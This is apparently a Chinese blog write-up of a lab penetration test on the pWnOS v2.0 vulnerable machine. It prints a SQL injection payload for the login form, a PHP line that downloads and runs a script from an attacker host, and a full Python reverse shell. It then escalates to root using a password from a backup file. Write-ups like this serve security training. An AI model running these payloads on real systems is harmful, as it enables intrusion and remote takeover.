zoukankan      html  css  js  c++  java
  • pWnOS v2.0 靶机测试笔记

    1 http://10.10.10.100/login.php 存在sql注入
    Username: admin@isints.com' and extractvalue(1,concat(0x5c,(select database())))#
    Password: x

    存在注入,那么sqlmap 跑一下。 保存post数据包


    C2c4b4e51d9e23c02c15702c136c3e950ba9a4af
    Cmd5收费 somd5给力 密码killerbeesareflying

    登录,发现还是这套,之前手工注册登录的也是这个

    看来重点不在这儿,尝试sqlmap --os-shell ,发现显示成功但是命令实际并未执行且没有输出

    后注意到这儿sqlmap是提供文件上传链接的,

    但是尝试上传自己马反弹shell还是不行,查看phpinfo的disable_function 发现没有禁用函数,

    说不清哪的问题,但是这个我在oscp中遇到过。 那么换一种方式

    <?php system("cd /tmp; wget http://10.10.10.2/python_bd.py; python python_bd.py");?>
    

    import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.10.2",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
    

    sqlmap写入文件

    然后浏览器访问3.php ,即可发现nc收到shell了

    提权:

    有价值的

    home目录未发现信息,尝试mysql方向
    找到mysql密码

    先尝试ssh连接,发现不行

    本地登录也不行

    最终在上一层目录发现其备份文件。。复制密码尝试su root 直接登录了。。

    总结:
    1 sqlmap写入文件时会提供一个上传文件的后门链接,如果sqlmap的后门文件无法使用,可使用这个链接再次上传自己的马
    2 sqlmap --file-write --file-dest

  • 相关阅读:
    01
    Django2
    Django01
    DS18B20时序解析,以及读出85原因诠释
    python字符串打印-不同方法vars
    2.对象属性
    1.excel-vba-对象
    搭建 eclipse,maven,tomcat 环境
    jsp include flush true
    oracle数据库基础
  • 原文地址:https://www.cnblogs.com/zongdeiqianxing/p/13455187.html
Copyright © 2011-2022 走看看